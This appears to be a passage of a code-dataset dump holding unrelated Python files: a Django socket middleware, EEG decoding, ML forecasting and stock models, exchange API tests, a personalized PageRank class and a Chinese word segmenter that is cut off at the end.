True\n\n\t\t\texcept:\n\t\t\t\tself.close()\n\t\t\t\tif recall and self.connect():\n\t\t\t\t\treturn self.send(data, recall=False)\n\t\t\t\treturn False\n\t\telse:\n\t\t\tif recall and self.connect():\n\t\t\t\treturn self.send(data, recall=False)\n\t\t\treturn False\n\n\tdef recv(self, *, recall=True):\n\t\tif self.connected:\n\t\t\ttry:\n\t\t\t\tlength = struct.unpack(\"!L\", self.sock.recv(4))\n\t\t\t\tpacket = self.sock.recv(length[0])\n\n\t\t\t\treturn True, json.loads(packet)\n\n\t\t\texcept:\n\t\t\t\tself.close()\n\t\t\t\tif recall and self.connect():\n\t\t\t\t\treturn self.recv(recall=False)\n\t\t\t\treturn (False,)\n\t\telse:\n\t\t\tif recall and self.connect():\n\t\t\t\treturn self.recv(recall=False)\n\t\t\treturn (False,)\n\nclass CommunicationMiddleware:\n\tdef __init__(self, get_response):\n\t\tself.get_response = get_response\n\n\tdef __call__(self, request):\n\t\tif request.globals.socket is None:\n\t\t\trequest.globals.socket = Socket(request.globals)\n\n\t\treturn self.get_response(request)","sub_path":"middleware/communication.py","file_name":"communication.py","file_ext":"py","file_size_in_byte":1796,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"546672604","text":"# Author: Nicolas Legrand (legrand@cyceron.fr)\n\nimport mne\nimport multiprocessing as mp\nimport numpy as np\nimport pandas as pd\nfrom mne.decoding import GeneralizingEstimator\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.pipeline import make_pipeline\nfrom sklearn.preprocessing import StandardScaler\n\nroot = \"/home/nicolas/git/DecodingMemoryIntrusions/data/\"\n\n# Subjects ID\nnames = [\n \"31NLI\",\n \"32CVI\",\n \"34LME\",\n \"35QSY\",\n \"36LSA\",\n \"37BMA\",\n \"38MAX\",\n \"39BDA\",\n \"40MMA\",\n \"41BAL\",\n \"42SPE\",\n \"44SMU\",\n \"45MJA\",\n \"46SQU\",\n \"47HMA\",\n \"50JOC\",\n \"52PFA\",\n \"53SMA\",\n \"55MNI\",\n \"56BCL\",\n \"57NCO\",\n \"58BAN\",\n \"59DIN\",\n \"60CAN\",\n]\n\nclassifier = RandomForestClassifier(\n class_weight=\"balanced\", n_estimators=50, random_state=42\n)\n\n\n# =========================================\n# %% Random label Decoding - Attention -> TNT\n# =========================================\ndef shuffled_training_labels(subject: str, n_boot: int = 200) -> np.ndarray:\n \"\"\"Run a generalized sliding decoder (GAT). Train on shuffled Attention labels.\n\n Parameters\n ----------\n subject : str\n The participant ID.\n n_boot : int\n Number of permutation.\n\n Returns\n -------\n ci : np.ndarray\n Upper and lower 95% CI for a noisy classifier.\n\n \"\"\"\n\n # Attention data\n attention_df = pd.read_csv(root + \"Attention/Behavior/\" + subject + \".txt\")\n attention = mne.read_epochs(root + \"Attention/6_decim/\" + subject + \"-epo.fif\")\n\n attention.crop(0.2, 0.5) # Only select time window of interest to save memory\n\n # TNT data\n tnt_df = pd.read_csv(root + \"TNT/Behavior/\" + subject + \".txt\")\n tnt = mne.read_epochs(root + \"TNT/6_decim/\" + subject + \"-epo.fif\")\n\n for condition in [\"No-Think\", \"Think\"]:\n\n shuffled = []\n\n for _ in range(n_boot):\n\n # Classifier\n clf = make_pipeline(StandardScaler(), classifier)\n\n time_gen = GeneralizingEstimator(clf, scoring=\"roc_auc\", n_jobs=1)\n\n X_train = attention._data[attention_df.Cond1 != \"Think\", :, :]\n y_train = attention_df.Cond1[attention_df.Cond1 != \"Think\"] == \"No-Think\"\n\n # Shuffle the trainning labels\n labels = y_train.sample(frac=1)\n\n # Fit the model\n time_gen.fit(X_train, labels)\n\n X_test = tnt._data[(tnt_df.Cond1 == condition), :, :]\n\n proba = time_gen.predict_proba(X_test)\n\n shuffled.append(proba)\n\n shuffled = np.asarray(shuffled)\n\n # 95th percentile\n ci = np.percentile(shuffled[:, :, :, :, 1], 97.5, axis=0)\n\n np.save(f\"{root}Results/Shuffled_95CI/{condition}/{subject}-high.npy\", ci)\n\n\n# %% Run\nif __name__ == \"__main__\":\n\n pool = mp.Pool(processes=24)\n pool.map(shuffled_training_labels, names)\n pool.close()\n pool.join()","sub_path":"code/8_Intrusions_Shuffled_Labels.py","file_name":"8_Intrusions_Shuffled_Labels.py","file_ext":"py","file_size_in_byte":2888,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"65336317","text":"\n\n#calss header\nclass _DAMN():\n\tdef __init__(self,): \n\t\tself.name = \"DAMN\"\n\t\tself.definitions = [u'to blame or strongly criticize something or someone: ', u'(especially of God) to force someone to stay in hell and be punished for ever: ', u'used to express anger with someone or something: ']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'verbs'\n\n\tdef run(self, obj1 = [], obj2 = []):\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/verbs/_damn.py","file_name":"_damn.py","file_ext":"py","file_size_in_byte":466,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"127970195","text":"import pandas as pd\nimport matplotlib.pyplot as plt\nfrom sklearn.tree import DecisionTreeClassifier, export_graphviz\nfrom sklearn.model_selection import train_test_split\nfrom subprocess import call\nfrom sklearn import preprocessing\nmain_data = pd.read_csv(\"Dataset2.csv\")\nlabel_encoder = preprocessing.LabelEncoder()\nfor data in main_data:\n print(f\"\\n\\nHeading :- {data}\")\n print(list(main_data[data]))\n main_data[data] = label_encoder.fit_transform(main_data[data])\n print(f\"\\n\\nAfter the tranformation of {data}\")\n print(list(main_data[data]))\ncombined_features = tuple(zip(main_data[\"Outlook\"], main_data[\"Temp\"], main_data[\"Wind\"], main_data[\"Humidity\"]))\nprint(\"After combined!\")\nprint(\"Outlook, Temp, Wind, Humidity\\n\\n\")\nfor pair in combined_features:\n print(pair)\nmain_data\nx_train, x_test, y_train, y_test = train_test_split(combined_features, main_data[\"Class\"], test_size = 0.1, random_state = 54)\nprint(x_train)\nfrom sklearn import metrics\ndtc = DecisionTreeClassifier(criterion = \"entropy\")\ndtc.fit(x_train, y_train)\ny_pred = dtc.predict(x_test)\ny_pred\ny_test\nprint(\"Accuracy: \", metrics.accuracy_score(y_test, y_pred))\nprint(x_test)\nprint(\"y predicted : \", y_pred)\nprint(f\"Actual y_test {y_test}\")\ndisp = metrics.plot_confusion_matrix(dtc, x_test, y_test)\ndisp.figure_.suptitle(\"Confusion Matrix\")\nprint(f\"Confusion matrix:\\n{disp.confusion_matrix}\")\nplt.show()\nexport_graphviz(dtc, out_file='tree_entropy.dot',\n feature_names=['outlook','temperature','humidity','wind'],\n class_names=['play_no','play_yes'], \n filled=True)\ncall(['dot', '-Tpng', 'tree_entropy.dot', '-o', 'tree_entropy.png', '-Gdpi=600'])\nimport matplotlib.pyplot as plt\nplt.figure(figsize = (14, 18))\nplt.imshow(plt.imread('tree_entropy.png'))\nplt.axis('off');\nplt.show();\n\n","sub_path":"LAB4/task1.py","file_name":"task1.py","file_ext":"py","file_size_in_byte":1806,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"22877994","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport numpy as np \nimport pandas as pd \nfrom keras import Sequential, layers, optimizers \nfrom keras.callbacks import EarlyStopping, ModelCheckpoint \nfrom keras.models import load_model \n\ndef GRUNet(input_shape=(None, 1), name='GRU_Recurrent_Network'):\n model = Sequential(name=name) \n model.add(layers.Input(shape=input_shape)) \n model.add(layers.GRU(32, return_sequences=True)) \n model.add(layers.GRU(64, return_sequences=False)) \n model.add(layers.Dense(1)) \n model.compile(loss='mse', optimizer=optimizers.Adam()) \n return model \n\ndef Convolutional(time_steps, input_shape=(None, 1), name='Convolutional_Forecaster'): \n model = Sequential(name=name) \n model.add(layers.Input(shape=input_shape)) \n model.add(layers.Conv1D(32, kernel_size=3, activation='relu', name='Conv1D')) \n model.add(layers.MaxPool1D(2, padding='same', name='MaxPool')) \n model.add(layers.Dense(time_steps, activation='sigmoid', name='Dense')) \n model.add(layers.TimeDistributed(layers.Dense(1), name='FC')) \n model.compile(optimizer=optimizers.Adam(), loss='mse') \n return model \n\ndef fit(model, x, y, path=None, batch_size=32, epochs=1000, verbose=1, shuffle=True, \n patience=25, val_split=0.1):\n es = EarlyStopping(monitor='val_loss', patience=patience, restore_best_weights=True) \n if path is not None: \n base_path = 'dspML/models/sequence/fitted/' \n mcp = ModelCheckpoint(base_path+path, monitor='val_loss', save_best_only=True) \n cb = [es, mcp] \n else: \n cb = [es] \n hist = model.fit(x, y, batch_size=batch_size, epochs=epochs, verbose=verbose, \n callbacks=cb, validation_split=val_split, shuffle=shuffle) \n return hist \n\ndef predict_forecast(model, train, steps): \n forecast = [] \n n = train.shape[1]\n train = np.squeeze(train[-1]) \n for i in range(steps): \n x = np.expand_dims(train[-n:], axis=(0, 2)) \n pred = model.predict(x) \n forecast.append(pred[0][0]) \n train = np.append(train, pred[0][0]) \n return pd.Series(forecast) \n\ndef load_humidity(recurrent=True): \n if recurrent: \n path = 'dspML/models/sequence/fitted/GRU_humidity.h5' \n else: \n path = 'dspML/models/sequence/fitted/cnn_humidity.h5' \n return load_model(path) \n\ndef load_wind_speed(recurrent=True): \n if recurrent: \n path = 'dspML/models/sequence/fitted/GRU_wind_speed.h5' \n else: \n path = 'dspML/models/sequence/fitted/cnn_wind_speed.h5' \n return load_model(path) \n\n","sub_path":"dspML/models/sequence/nnetfc.py","file_name":"nnetfc.py","file_ext":"py","file_size_in_byte":2567,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"258454753","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\ndata_label = input(\"data:\")\nnbr_of_plots = data_label.split(\" \")\nprint(nbr_of_plots)\nfile_names = []\nts = 1/200\nfor data_file in nbr_of_plots:\n file_names.append(f\"controller_{data_file}.log\")\n\n\nfont = {'family': 'serif',\n 'color': 'darkred',\n 'weight': 'normal',\n 'size': 16,\n }\n\ndata_labels = {\n 'imu_data': ['roll angle', 'pitch angle', 'yaw angle',\n 'roll rate', 'pitch rate', 'yaw rate'],\n 'motor': ['v1', 'v2', 'v3', 'v4'],\n 'errors': ['roll angle error', 'pitch angle error',\n 'roll rate error', 'pitch rate error', 'yaw rate error'],\n 'PID': ['k roll angle', 'k pitch angle',\n 'roll rate pid', 'pitch rate pid', 'yaw rate pid','Integral r','Integral p'],\n 'references': ['roll rate ref', 'pitch rate ref', 'yaw rate ref'],\n }\n\n# Open file_name safely and store data as a matrix\nfile_nbr = 0\nfor file_name in file_names:\n with open(file_name) as file:\n data = np.loadtxt(file, delimiter=' ')\n length = data.shape[0]\n time = np.transpose(ts*np.arange(0, length))\n counter = 0\n loop_length = int(data.shape[1])\n print(loop_length)\n for i in range(loop_length):\n plt.figure()\n plt.plot(time, data[:,counter],'b')\n plt.title(data_labels[nbr_of_plots[file_nbr]][counter], fontdict=font)\n counter +=1\n\n file_nbr +=1\n\n# This should be changed\n\n\n\n#print(time)\n#print(data)\n\n\n\n#print(loop_length)\n# labels = ['u1 v1','u2 v2',\n# 'u3 v3','u4 v4',\n# 'pitch roll', 'Ppitch Proll',\n# 'I_a_p I_a_r', 'K-del rate loop'\n# ]\n\n\n\n# plt.plot(time, data[:,counter],'orange')\n# counter+=1\n \n\nplt.show()\n\n\n\n\n","sub_path":"tools/controller_plot.py","file_name":"controller_plot.py","file_ext":"py","file_size_in_byte":1757,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"175430537","text":"from math import sin, cos, sqrt, atan2, radians\nimport requests\nimport json\n\nfrom captcha.fields import CaptchaField\nfrom django.forms import forms\n\n\ndef search(mylat, mylng, dist, sbi, bemp):\n url = 'https://data.tycg.gov.tw/api/v1/rest/datastore/a1b4714b-3b75-4ff8-a8f2-cc377e4eaa0f?format=json'\n r = requests.get(url)\n root_object = json.loads(r.text)\n result_object = root_object['result']\n records_array = result_object['records']\n dict = {}\n for record in records_array:\n lat = float(record['lat'])\n lng = float(record['lng'])\n m = distance(mylat, mylng, lat, lng)\n t = '%.1f' % (m / (3000/60))\n if int(record['sbi']) >= sbi and int(record['bemp']) >= bemp and m <= dist:\n record['m'] = m//1\n record['t'] = t\n # 格式化時間 ex:20190810100326 變成 2019/08/10 10:03:26\n mday = record['mday']\n record['mday'] = mday[0:4] + '/' + mday[4:6] + '/' + mday[6:8] + \" \" + \\\n mday[8:10] + ':' + mday[10:12] + ':' + mday[12:]\n dict.update({record['sna']: record})\n\n return dict\n\n\ndef distance(point_1_lat, point_1_lon, point_2_lat, point_2_lon):\n # approximate radius of earth in km\n R = 6373.0\n lat1 = radians(float(point_1_lat))\n lon1 = radians(float(point_1_lon))\n lat2 = radians(float(point_2_lat))\n lon2 = radians(float(point_2_lon))\n dlon = lon2 - lon1\n dlat = lat2 - lat1\n a = sin(dlat / 2)**2 + cos(lat1) * cos(lat2) * sin(dlon / 2)**2\n c = 2 * atan2(sqrt(a), sqrt(1 - a))\n distance = R * c * 1000 # m 公尺\n return distance\n\n\n# 驗證碼類別\nclass CaptchaCheck(forms.Form):\n captcha = CaptchaField()\n","sub_path":"Django0716/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1705,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"83704967","text":"import tensorflow as tf\r\nimport numpy as np\r\nimport pandas as pd\r\nimport Data_Processor\r\n\r\nclass LSTM_net():\r\n def __init__(self,sess,stock_count,\r\n lstm_size,\r\n num_layers,\r\n num_steps,\r\n input_size,\r\n embed_size,\r\n train_ratio,\r\n logs_dir='',\r\n plots_dir=''):\r\n self.sess = sess\r\n self.stock_count = stock_count\r\n self.lstm_size = lstm_size\r\n self.num_layers = num_layers\r\n self.num_steps = num_steps\r\n self.input_size = input_size\r\n self.embed_size = embed_size or -1\r\n self.logs_dir = logs_dir\r\n self.plots_dir = plots_dir\r\n self.train_ratio=train_ratio\r\n self.graph()\r\n def graph(self):\r\n '''\r\n 构建数据流图\r\n '''\r\n '''定义需要用到的占位符'''\r\n self.learning_rate = tf.placeholder(tf.float32,None,name='LearningRate')\r\n self.keep_prob = tf.placeholder(tf.float32,None,name='KeepProb')\r\n self.symbols_x = tf.placeholder(tf.int32,[None,self.num_steps],name='stock_labels_x')\r\n self.inputs = tf.placeholder(tf.float32,[None,self.num_steps,2],name='inputs')\r\n # 2 is for the change and vol,是因为有涨跌率和交易量两组数据\r\n self.targets = tf.placeholder(tf.float32,[None,1],name='targets')\r\n\r\n '''Embedding 层,用于将每只股票用embed_size大小的向量表示'''\r\n self.embed_matrix=tf.Variable(tf.random_uniform([self.stock_count,self.embed_size],minval=-0.2,maxval=0.2),name='embed_matrix')\r\n stock_label_embeds_x = tf.nn.embedding_lookup(self.embed_matrix, self.symbols_x)\r\n\r\n '''将输入和股票的Embed_size向量表示组合起来'''\r\n self.inputs_with_embeds = tf.concat([self.inputs,stock_label_embeds_x],axis=2)\r\n\r\n '''根据lstm_size、keep_prob、num_layers构建含Dropout包装器的LSTM神经网络'''\r\n def _create_one_cell():\r\n cell=tf.nn.rnn_cell.DropoutWrapper(\r\n tf.nn.rnn_cell.LSTMCell(self.lstm_size,state_is_tuple=True),\r\n output_keep_prob=self.keep_prob\r\n )\r\n return cell\r\n cell=tf.nn.rnn_cell.MultiRNNCell([_create_one_cell() for i in range(self.num_layers)],state_is_tuple=True) if self.num_layers > 1 else _create_one_cell()\r\n\r\n '''获得LSTM网络的输出和状态'''\r\n val,_ = tf.nn.dynamic_rnn(cell,self.inputs_with_embeds,dtype=tf.float32)\r\n\r\n '''根据LSTM网络的输出计算出与target维度匹配的输出'''\r\n # Before transpose, val.get_shape() = (batch_size, num_steps, lstm_size)\r\n # After transpose, val.get_shape() = (num_steps, batch_size, lstm_size)\r\n val = tf.transpose(val,[1,0,2])\r\n last = tf.gather(val,int(val.get_shape()[0])-1,name='last_lstm_output')\r\n weight=tf.Variable(tf.truncated_normal([self.lstm_size,1]))\r\n bias=tf.Variable(tf.constant(0.1,shape=[1]))\r\n self.prediction=tf.matmul(last,weight)+bias\r\n\r\n '''模型的代价函数和优化器'''\r\n self.loss=tf.reduce_mean(tf.square(self.prediction-self.targets))\r\n self.optimizer=tf.train.RMSPropOptimizer(learning_rate=self.learning_rate).minimize(self.loss)\r\n\r\n def train(self,max_epoch,init_learning_rate,decay_rate,decay_epoch,batch_ratio,keep_prob,interval,future):\r\n ### 获取数据,设定好batch_size与训练epoch,将数据feed进图开始训练和测试\r\n\r\n '''获取数据,初始化模型参数'''\r\n stock_code,stock_data,mean_fluctuation=Data_Processor.get_stocks(\r\n input_size=self.input_size,num_steps=self.num_steps,train_ratio=self.train_ratio,interval=interval,future=future)\r\n tf.global_variables_initializer().run()\r\n\r\n '''合并每只股票的测试样本为一个统一的测试集'''\r\n merge_test_x = []\r\n merge_test_y = []\r\n merge_test_labels_x = []\r\n for test_label, test_data in enumerate(stock_data):\r\n merge_test_x += list(test_data.test_x)\r\n merge_test_y += list(test_data.test_y)\r\n merge_test_labels_x += [[test_label] * self.num_steps] * len(test_data.test_x)\r\n test_feed_dic = {\r\n self.learning_rate: 0.0,\r\n self.keep_prob: 1.0,\r\n self.inputs: np.array(merge_test_x),\r\n self.targets: np.array(merge_test_y),\r\n self.symbols_x: np.array(merge_test_labels_x),\r\n }\r\n\r\n # 开始训练\r\n for epoch in range(max_epoch):\r\n\r\n '''每轮更新一次学习率'''\r\n learning_rate = init_learning_rate * (\r\n decay_rate ** max(float(epoch + 1 - decay_epoch), 0.0)\r\n )\r\n\r\n for label,data in enumerate(stock_data):\r\n # 准备训练集\r\n train_x = tf.placeholder(data.train_x.dtype,data.train_x.shape)\r\n train_y = tf.placeholder(data.train_y.dtype,data.train_y.shape)\r\n\r\n # 取batch_size个样本的训练集\r\n batch_size=int(len(data.train_x)*batch_ratio)\r\n dataset=tf.data.Dataset.from_tensor_slices((train_x,train_y))\r\n dataset=dataset.batch(batch_size)\r\n iterator=dataset.make_initializable_iterator()\r\n self.sess.run(iterator.initializer, feed_dict={train_x: data.train_x, train_y: data.train_y})\r\n next_batch = iterator.get_next()\r\n batch_x, batch_y = self.sess.run(next_batch)\r\n # 构建每个输入对应的标签\r\n batch_label_x = np.array([[label]*self.num_steps] * batch_x.shape[0])\r\n\r\n train_feed_dic = {\r\n self.learning_rate:learning_rate,\r\n self.symbols_x:batch_label_x,\r\n #self.symbols_y:batch_label_y,\r\n self.keep_prob:keep_prob,\r\n self.inputs:batch_x,\r\n self.targets:batch_y,\r\n }\r\n # 训练\r\n train_loss,optimizer=self.sess.run(\r\n [self.loss,self.optimizer],train_feed_dic\r\n )\r\n print('After ', epoch, 'the train_loss: ', train_loss)\r\n # 测试\r\n test_pred, test_loss = self.sess.run([self.prediction, self.loss], test_feed_dic)\r\n print('After ',epoch,'the test_loss: ',test_loss)\r\n\r\n #最终再测试一次\r\n final_pred,final_loss=self.sess.run([self.prediction, self.loss], test_feed_dic)\r\n print('Final,the test_loss: ',final_loss)\r\n\r\n #预测数据和target分别存入txt方便观察\r\n np.savetxt('out\\pred.txt',final_pred)\r\n np.savetxt('out\\out.txt',merge_test_y)\r\n\r\n #保存一下模型\r\n Saver=tf.train.Saver()\r\n Saver.save(sess=self.sess,save_path='.\\save\\params')\r\n\r\n # 计算平均预测误差\r\n sum_error=0\r\n for i in range(final_pred.shape[0]):\r\n print('final_pred:',final_pred[i][0],' and the target:',merge_test_y[i][0])\r\n sum_error += (final_pred[i][0] - merge_test_y[i][0])\r\n mean_error=sum_error/final_pred.shape[0]\r\n\r\n print('所有股票涨幅的平均波动为:',mean_fluctuation)\r\n print('在测试集上对于涨跌趋势的预测的平均误差为:',mean_error)\r\n\r\n\r\n\r\ndef main():\r\n with tf.Session() as sess:\r\n lstm_model=LSTM_net(\r\n sess,\r\n stock_count=50,\r\n lstm_size=128,\r\n num_layers=1,\r\n num_steps=250,#一年250个交易日\r\n input_size=10,\r\n embed_size=3,\r\n train_ratio=0.9,\r\n logs_dir='./logs',\r\n plots_dir='. /plots'\r\n )\r\n lstm_model.train(max_epoch=30,\r\n init_learning_rate=0.001,\r\n decay_rate=0.98,\r\n decay_epoch=10,\r\n batch_ratio=0.8,\r\n keep_prob=0.8,\r\n interval=30,\r\n future=30\r\n )\r\nmain()","sub_path":"Graduate_Proj_V1/model_lstm.py","file_name":"model_lstm.py","file_ext":"py","file_size_in_byte":8158,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"550977827","text":"import pytest\n\nimport cryptocom.exchange as cro\n\n\n@pytest.mark.asyncio\nasync def test_get_pairs(exchange: cro.Exchange):\n pairs = await exchange.get_pairs()\n keys = [\n 'quote_currency', 'base_currency',\n 'price_decimals', 'quantity_decimals'\n ]\n for pair_keys in pairs.values():\n assert sorted(keys) == sorted(pair_keys)\n\n for pair in pairs:\n assert pair in cro.Pair\n\n\n@pytest.mark.asyncio\nasync def test_get_tickers(exchange: cro.Exchange):\n tickers = await exchange.get_tickers()\n keys = sorted(['b', 'k', 'a', 't', 'v', 'h', 'l', 'c'])\n for data in tickers.values():\n assert keys == sorted(data)\n sorted(p.value for p in tickers) == sorted(p.value for p in cro.Pair)\n ticker = await exchange.get_tickers(cro.Pair.BTC_USDT)\n assert keys == sorted(ticker)\n\n\n@pytest.mark.asyncio\nasync def test_get_trades(exchange: cro.Exchange):\n trades = await exchange.get_trades(cro.Pair.CRO_USDT)\n keys = sorted(['p', 'q', 's', 'd', 't'])\n for trade in trades:\n assert sorted(trade) == keys\n\n\n@pytest.mark.asyncio\nasync def test_get_price(exchange: cro.Exchange):\n price = await exchange.get_price(cro.Pair.CRO_USDT)\n assert price > 0\n\n\n@pytest.mark.asyncio\nasync def test_get_orderbook(exchange: cro.Exchange):\n data = await exchange.get_orderbook(cro.Pair.CRO_USDT, depth=50)\n asks = data['asks']\n bids = data['bids']\n # price, quantity, number of orders\n assert asks and bids\n assert len(asks[0]) == 3\n assert len(bids[0]) == 3\n\n\n@pytest.mark.asyncio\nasync def test_listen_candles(exchange: cro.Exchange):\n candles = []\n pairs = (cro.Pair.CRO_USDC, cro.Pair.USDC_USDT, cro.Pair.BTC_USDT)\n count = 0\n default_count = 300\n\n async for candle in exchange.listen_candles(cro.Period.MINS, *pairs):\n candles.append(candle)\n count += 1\n if count == len(pairs) * default_count:\n break\n\n for pair in pairs:\n assert len([\n c for c in candles if c.pair == pair\n ]) == default_count\n\n\n@pytest.mark.asyncio\nasync def test_listen_trades(exchange: cro.Exchange):\n trades = []\n count = 0\n pairs = [cro.Pair.CRO_USDT, cro.Pair.BTC_USDT]\n pairs_seen = set()\n async for trade in exchange.listen_trades(*pairs):\n trades.append(trade)\n pairs_seen.add(trade.pair)\n if count > 100:\n break\n count += 1\n\n assert len(pairs_seen) == len(pairs)\n\n\n@pytest.mark.asyncio\nasync def test_listen_orderbook(exchange: cro.Exchange):\n pairs = [cro.Pair.CRO_USDT, cro.Pair.BTC_USDT]\n orderbooks = []\n depth = 50\n\n async for orderbook in exchange.listen_orderbook(*pairs, depth=depth):\n orderbooks.append(orderbook)\n if set(pairs) == set(o.pair for o in orderbooks):\n break\n\n for book in orderbooks:\n assert book.buys and book.sells\n assert book.sells[0].price > book.buys[0].price\n assert book.spread > 0\n assert len(book.sells) == len(book.buys) == depth\n","sub_path":"tests/test_market.py","file_name":"test_market.py","file_ext":"py","file_size_in_byte":3020,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"171847129","text":"from cnlp.data.word_dict import WordDict\nfrom cnlp.data.tokenizers import dag\nfrom cnlp.data.tokenizers import mechanical\n\n\nclass Tokenizer(object):\n def __init__(self) -> None:\n self.wd = WordDict()\n\n def cut(self,\n text: str = None,\n methods: str = \"dag\") -> list:\n if text:\n if methods == \"mechanical\":\n tokenizer_data = mechanical.cut_with_forward_match(text, self.wd.get_common_word_dict_list())\n elif methods == \"dag\":\n tokenizer_data = dag.cut(text, *self.wd.get_common_word_freq_dict())\n else:\n raise ValueError(f\"Error cut methods: {methods}\")\n else:\n raise ValueError(\"text is empty !\")\n\n return tokenizer_data\n","sub_path":"cnlp/data/tokenizers/tokenizer.py","file_name":"tokenizer.py","file_ext":"py","file_size_in_byte":766,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"605288778","text":"'''\nAuthor: Christoph Stich\nDate: 2015-06-16\nThis is a port from Edwin Chen's Scala code to Python 3\nMy contribution:\n - I fixed a bug where only a symmetric relationship would\n contribute to the propagation of the personalized PageRank score. Now you\n can either just use the outgoing links or any links\n - Breaks ties randomly\n\nAlso known as Rooted Page Rank. The citation is as follows:\n Liben-Nowell D, Kleinberg J M. The link-prediction problem for social\n networks. Journal of the American Society for Information Science and\n Technology, 2007, 58: 1019{1031\n'''\n\nimport copy\nimport collections\nimport random\n\n\nclass PersonalizedPageRank(object):\n '''\n Given a directed graph of follower and following edges, compute personalized\n PageRank scores around specified starting nodes.\n\n A personalized PageRank is similar to standard PageRank, except that when\n randomly teleporting to a new node, the surfer always teleports back to the\n given source node being personalized (rather than to a node chosen uniformly\n at random, as in the standard PageRank algorithm)\n\n In other words, the random surfer in the personalized PageRank model works\n as follows:\n - He starts at the source node X that we want to calculate a\n personalized PageRank around.\n - At step i: with probability p, the surfer moves to a neighboring node\n chosen uniformly at random;\n with probability $1-p$, the surfer instead teleports back\n to the original source node X.\n\n The limiting probability that the surfer is at node N is the\n personalized PageRank score of node N around X.\n '''\n\n def __init__(self, inLinks, outLinks, weights=None,\n numOfIterations=3, maxNodesToKeep=25,\n directed=False, alpha=0.5, excludeSelf=True):\n '''\n @maxNodesToKeep: How many nodes to keep. If None, returns all\n @directed: If true only consider outgoing links as the original PageRank\n '''\n self.inLinks = copy.deepcopy(inLinks) # Followers as a dictionary where\n # key: node, values: peers\n self.outLinks = copy.deepcopy(outLinks) # Followees as a dictionary\n # where key: node, values: peers\n self.weights = weights # Is a nested dictionary of the form\n # weights[user][peer] = tieStrength\n self.numOfIterations = numOfIterations\n self.maxNodesToKeep = maxNodesToKeep\n self.directed = directed\n self.alpha = alpha\n self.exclude = excludeSelf\n\n def pageRank(self, user, returnScores=False, weighted=False):\n '''\n Calculate a personalized PageRank around the given user, and return a\n list of the nodes with the highest personalized PageRank scores.\n Care was taken to break ties randomly.\n @user: The user to calculat the Personalized PageRank for\n algorithm does. If false, uses any tie to propagate the score\n @return A list of (node, probability of landing at this node after\n running a personalize PageRank for K iterations) pairs.\n '''\n probs = {}\n probs[user] = 1\n pageRankProbs = self.pageRankHelper(user, probs, self.numOfIterations,\n self.directed, self.alpha, weighted)\n pageRankProbs = list(pageRankProbs.items())\n # Reshuffle results of the PPR to make sure ties are broken at random\n random.shuffle(pageRankProbs)\n\n if self.exclude:\n pageRankProbs = [e for e in pageRankProbs if str(e[0]) != str(user)]\n # The str cast is probably unnecessary but I am afraid of dynamic\n # type checking\n\n if returnScores:\n return pageRankProbs\n else:\n # Return the n-highest scoring nodes\n pageRankProbs = sorted(pageRankProbs, key=lambda x: x[1],\n reverse=True)[:self.maxNodesToKeep]\n return [e[0] for e in pageRankProbs]\n\n def pageRankHelper(self, start, probs, numIterations, directed, alpha,\n weighted):\n if numIterations <= 0:\n return probs\n else:\n # This map holds the updated set of probabilities, after the\n # current iteration.\n probsPropagated = collections.defaultdict(float)\n # With probability 1 - alpha, we teleport back to the start node.\n probsPropagated[start] = 1 - alpha\n\n # Propagate the previous probabilities...\n for node, prob in probs.items():\n forwards = self.getOutLinks(node)\n if directed:\n neighbors = list()\n neighbors + forwards\n else:\n backwards = self.getInLinks(node)\n neighbors = set(forwards + backwards)\n\n if len(neighbors) != 0:\n probToPropagate = alpha * prob / len(neighbors)\n # With probability alpha, we move to a follower...\n # And each node equally distributes its current probability to\n # its neighbors.\n for neighbor in neighbors:\n # If edge strength is important then we have to weight the\n # probabilites we propagate. The tie strengths have to add\n # up to 1 for each node. Effectively we are talking about\n # relative tie strengths\n if weighted:\n weight = self.weights[node][neighbor]\n else:\n weight = 1\n probsPropagated[neighbor] += (probToPropagate * weight)\n\n return self.pageRankHelper(start, probsPropagated,\n numIterations - 1, directed, alpha, weighted)\n\n def getInLinks(self, user):\n try:\n return self.inLinks[user]\n except KeyError:\n return list()\n\n def getOutLinks(self, user):\n try:\n return self.outLinks[user]\n except KeyError:\n return list()\n","sub_path":"PersonalizedPageRank.py","file_name":"PersonalizedPageRank.py","file_ext":"py","file_size_in_byte":6176,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"264125815","text":"# -*- encoding:utf-8 -*-\n# author: unclejimao\n\n# 使用逆向最大匹配算法实现中文分词\nimport load_dic\n\n# 逆向最大匹配算法实现中文切词方法\ndef cut_words(raw_sentence, words_dic):\n \"\"\"\n\n :param raw_sentence: 待切分序列\n :param words_dic: 自定义词典\n :return: 切词列表\n \"\"\"\n max_length = max(len(word) for word in words_dic) # 统计词典中词语的最大词长\n sentence = raw_sentence.strip()\n words_length = len(sentence) # 待切分序列长度\n cut_word_list = [] # 用于存储切词结果\n\n while words_length > 0:\n max_cut_length = min(words_length, max_length)\n sub_sentence = sentence[-max_cut_length:]\n\n while max_cut_length > 0:\n if sub_sentence in words_dic:\n cut_word_list.append(sub_sentence)\n break\n elif max_cut_length == 1:\n cut_word_list.append(sub_sentence)\n break\n else:\n max_cut_length 